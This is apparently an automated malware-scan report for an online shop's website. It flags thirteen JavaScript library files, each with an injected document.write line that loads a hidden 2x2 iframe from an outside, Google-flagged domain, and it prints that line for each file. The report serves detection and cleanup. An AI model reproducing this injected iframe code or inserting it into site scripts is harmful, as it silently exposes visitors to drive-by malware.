New scan:

Malware Scanner report for razorpitusa.com

Malicious/Suspicious/Total urls checked
13/0/15
13 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "razorpitusa.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
13/0/15
13 malicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=razorpitusa.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.razorpitusa.com/
200 OK
Content-Length: 12201
Content-Type: text/html
clean
http://www.razorpitusa.com/js/prototype/prototype.js
200 OK
Content-Length: 130132
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');

var Prototype = {
Version: '1.6.0.3',
Browser: {
IE: !!(window.attachEvent &&
navigator.userAgent.indexOf('Opera') === -1),
Opera: navigator.userAgent.indexOf('Opera') > -1,
WebKit: navigator.userAgent.indexOf('AppleWebKit/') > -1,
Gecko: navigator.userAgent.indexOf('Gecko') > -1 &&
navi
...[3914 bytes skipped]...

Decoded script:


<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>

Malicious iFrame found.
size: 2x2     
src: http://gabriellerosephotography.com/emad.html?j=679685
This URL is marked by Google as suspicious

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685>

http://www.razorpitusa.com/js/lib/ccard.js
200 OK
Content-Length: 917
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');

function validateCreditCard(s) {
var v = "0123456789";
var w = "";
for (i=0; i < s.length; i++) {
x = s.charAt(i);
if (v.indexOf(x,0) != -1)
w += x;
}
j = w.length / 2;
k = Math.floor(j);
m = Math.ceil(j) - k;
c = 0;
for (i=0; i<k; i++) {
a = w.charAt(i*2+m) * 2;
c += a > 9 ? Math.floor(a/10 + a%10) : a;
}
for (i=0; i<k+m; i++) c += w.charAt(i*2+1-m) * 1;
return (c%10 == 0);
}

Decoded script:


<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>

Malicious iFrame found.
size: 2x2     
src: http://gabriellerosephotography.com/emad.html?j=679685
This URL is marked by Google as suspicious

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685>

http://www.razorpitusa.com/js/prototype/validation.js
200 OK
Content-Length: 37593
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');

var Validator = Class.create();
Validator.prototype = {
initialize : function(className, error, test, options) {
if(typeof test == 'function'){
this.options = $H(options);
this._test = test;
} else {
this.options = $H(test);
this._test = function(){return true};
}

...[3840 bytes skipped]...

Decoded script:


<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>

Malicious iFrame found.
size: 2x2     
src: http://gabriellerosephotography.com/emad.html?j=679685
This URL is marked by Google as suspicious

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685>

http://www.razorpitusa.com/js/scriptaculous/builder.js
200 OK
Content-Length: 4916
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');

var Builder = {
NODEMAP: {
AREA: 'map',
CAPTION: 'table',
COL: 'table',
COLGROUP: 'table',
LEGEND: 'fieldset',
OPTGROUP: 'select',
OPTION: 'select',
PARAM: 'object',
TBODY: 'table',
TD: 'table',
TFOOT: 'table',
TH: 'table',
THEAD: 'table',
TR: 'table'
},

...[4042 bytes skipped]...

Decoded script:


<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>

Malicious iFrame found.
size: 2x2     
src: http://gabriellerosephotography.com/emad.html?j=679685
This URL is marked by Google as suspicious

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685>

http://www.razorpitusa.com/js/scriptaculous/effects.js
200 OK
Content-Length: 38917
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');

String.prototype.parseColor = function() {
var color = '#';
if (this.slice(0,4) == 'rgb(') {
var cols = this.slice(4,this.length-1).split(',');
var i=0; do { color += parseInt(cols[i]).toColorPart() } while (++i<3);
} else {
if (this.slice(0,1) == '#') {
if (this.length==4) for(var i=1;i<4;i++) color += (this.charAt(i) + th
...[3880 bytes skipped]...

Decoded script:


<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>

Malicious iFrame found.
size: 2x2     
src: http://gabriellerosephotography.com/emad.html?j=679685
This URL is marked by Google as suspicious

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685>

http://www.razorpitusa.com/js/scriptaculous/dragdrop.js
200 OK
Content-Length: 31364
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');

if(Object.isUndefined(Effect))
throw("dragdrop.js requires including script.aculo.us' effects.js library");
var Droppables = {
drops: [],
remove: function(element) {
this.drops = this.drops.reject(function(d) { return d.element==$(element) });
},
add: function(element) {
element = $(element);
var options = Object.extend({...[3905 bytes skipped]...

Decoded script:


<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>

Malicious iFrame found.
size: 2x2     
src: http://gabriellerosephotography.com/emad.html?j=679685
This URL is marked by Google as suspicious

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685>

http://www.razorpitusa.com/js/scriptaculous/controls.js
200 OK
Content-Length: 34969
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');

if(typeof Effect == 'undefined')
throw("controls.js requires including script.aculo.us' effects.js library");
var Autocompleter = { };
Autocompleter.Base = Class.create({
baseInitialize: function(element, update, options) {
element = $(element);
this.element = element;
this.update = $(update);
this.hasFocus =
...[3839 bytes skipped]...

Decoded script:


<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>

Malicious iFrame found.
size: 2x2     
src: http://gabriellerosephotography.com/emad.html?j=679685
This URL is marked by Google as suspicious

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685>

http://www.razorpitusa.com/js/scriptaculous/slider.js
200 OK
Content-Length: 10503
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');

if (!Control) var Control = { };
Control.Slider = Class.create({
initialize: function(handle, track, options) {
var slider = this;
if (Object.isArray(handle)) {
this.handles = handle.collect( function(e) { return $(e) });
} else {
this.handles = [$(handle)];
}
this.track = $(track);
this.options = opti
...[3830 bytes skipped]...

Decoded script:


<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>

Malicious iFrame found.
size: 2x2     
src: http://gabriellerosephotography.com/emad.html?j=679685
This URL is marked by Google as suspicious

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685>

http://www.razorpitusa.com/js/varien/js.js
200 OK
Content-Length: 21708
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');

function popWin(url,win,para) {
var win = window.open(url,win,para);
win.focus();
}
function setLocation(url){
window.location.href = url;
}
function setPLocation(url, setFocus){
if( setFocus ) {
window.opener.focus();
}
window.opener.location.href = url;
}
function setLanguageCode(code, fromCode){
...[3932 bytes skipped]...

Decoded script:


<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>

Malicious iFrame found.
size: 2x2     
src: http://gabriellerosephotography.com/emad.html?j=679685
This URL is marked by Google as suspicious

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685>

http://www.razorpitusa.com/js/varien/form.js
200 OK
Content-Length: 11885
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');

VarienForm = Class.create();
VarienForm.prototype = {
initialize: function(formId, firstFieldFocus){
this.form = $(formId);
if (!this.form) {
return;
}
this.cache = $A();
this.currLoader = false;
this.currDataIndex = false;
this.validator = new Validation(thi
...[3895 bytes skipped]...

Decoded script:


<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>

Malicious iFrame found.
size: 2x2     
src: http://gabriellerosephotography.com/emad.html?j=679685
This URL is marked by Google as suspicious

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685>

http://www.razorpitusa.com/js/varien/menu.js
200 OK
Content-Length: 4597
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');

var mainNav = function() {
var main = {
obj_nav : $(arguments[0]) || $("nav"),
settings : {
show_delay : 0,
hide_delay : 0,
_ie6 : /MSIE 6.+Win/.test(navigator.userAgent),
_ie7 : /MSIE 7.+Win/.test(navigator.userAgent)
},

...[3160 bytes skipped]...

Decoded script:


<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>

Malicious iFrame found.
size: 2x2     
src: http://gabriellerosephotography.com/emad.html?j=679685
This URL is marked by Google as suspicious

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685>

http://www.razorpitusa.com/js/mage/translate.js
200 OK
Content-Length: 1768
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');

var Translate = Class.create();
Translate.prototype = {
initialize: function(data){
this.data = $H(data);
},
translate : function(){
var args = arguments;
var text = arguments[0];
if(this.data.get(text)){
return this.data.get(text);
}
return text;
},

...[350 bytes skipped]...

Decoded script:


<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>

Malicious iFrame found.
size: 2x2     
src: http://gabriellerosephotography.com/emad.html?j=679685
This URL is marked by Google as suspicious

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685>

http://www.razorpitusa.com/js/mage/cookies.js
200 OK
Content-Length: 2786
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');

if (!window.Mage) var Mage = {};
Mage.Cookies = {};
Mage.Cookies.expires = null;
Mage.Cookies.path = '/';
Mage.Cookies.domain = null;
Mage.Cookies.secure = false;
Mage.Cookies.set = function(name, value){
var argv = arguments;
var argc = arguments.length;
var expires = (argc > 2) ? argv[2] : Mage.Cookies.expires;

...[1427 bytes skipped]...

Decoded script:


<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>

Malicious iFrame found.
size: 2x2     
src: http://gabriellerosephotography.com/emad.html?j=679685
This URL is marked by Google as suspicious

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685>

http://www.razorpitusa.com/index.php/
200 OK
Content-Length: 12201
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: razorpitusa.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: razorpitusa.com
Referer: http://www.google.com/search?q=razorpitusa.com

Result:
The result is similar to the first query. There are no suspicious redirects found.